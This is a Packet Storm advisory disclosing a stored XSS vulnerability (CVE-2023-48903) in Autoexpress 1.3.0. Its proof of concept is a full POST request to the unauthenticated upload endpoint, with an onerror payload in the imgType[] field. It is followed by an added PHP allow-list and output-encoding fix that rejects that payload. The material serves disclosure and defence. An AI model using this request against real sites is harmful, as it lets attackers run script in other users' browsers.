
Tramyardg Autoexpress 1.3.0 Cross Site Scripting

Tramyardg Autoexpress version 1.3.0 suffers from a persistent cross site scripting vulnerability.

Packet Storm
# Exploit Title: tramyardg autoexpress - Stored Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: 11/28/2023
# Exploit Author: Scott White
# Vendor Homepage: https://github.com/tramyardg/autoexpress
# Version: v1.3.0
# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52
# CVE : CVE-2023-48903

# References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48903
https://www.cve.org/CVERecord?id=CVE-2023-48903

# Description:
Autoexpress 1.3.0 is affected by a stored cross-site scripting (XSS) vulnerability that allows an unauthenticated attacker to execute JavaScript commands.

# Proof of Concept:
+ Go to "http://localhost/autoexpress"
+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)
+ The form-data name "imageType[]" is vulnerable

# Sample Request
POST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1
Host: localhost
Content-Length: 17016
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YR
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="files[]"; filename="image.jpeg"
Content-Type: image/jpeg

IMAGE_CONTENT
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="id"

CAR_ID
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="fd[]"

IMAGE_CONTENT_BASE64_ENCODED
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="imgType[]"

data:image/jpeg;base64"onerror=alert(1002)<!--
------WebKitFormBoundary9juDWgTa5YsjE2YR--
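
A server-side check for the field used in the sample request, as an added example; it is not code from the advisory or from the Autoexpress project. The function names, the allow-list contents and the assumed `<img src="...">` rendering are hypothetical, since the page does not show the application's source.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers; the page does not show Autoexpress's own source.
// Exact allow-list of data-URI prefixes the upload form may send in imgType[].
const ALLOWED_IMG_TYPES = [
    'data:image/jpeg;base64',
    'data:image/png;base64',
    'data:image/gif;base64',
];

// Returns the cleaned list, or null if any element is not an exact allow-list match.
function validate_img_types(mixed $values): ?array
{
    if (!is_array($values) || $values === []) {
        return null;
    }
    foreach ($values as $v) {
        if (!is_string($v) || !in_array($v, ALLOWED_IMG_TYPES, true)) {
            return null; // fail closed: reject the whole upload
        }
    }
    return array_values($values);
}

// Assumed rendering: type and base64 data joined into an <img src="..."> attribute.
// Encoding at output also neutralises rows stored before validation existed.
function render_img(string $imgType, string $base64): string
{
    $src = htmlspecialchars($imgType . ',' . $base64, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<img src="' . $src . '" alt="">';
}

// Constructed sample input: a normal value and the imgType[] value from the sample request.
$good = ['data:image/jpeg;base64'];
$bad  = ['data:image/jpeg;base64"onerror=alert(1002)<!--'];

var_dump(validate_img_types($good) !== null);
var_dump(validate_img_types($bad) !== null);
echo render_img($bad[0], 'AAAA'), PHP_EOL;
```

An upload handler would call `validate_img_types($_POST['imgType'] ?? null)` before storing anything and answer with HTTP 400 when it returns null.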
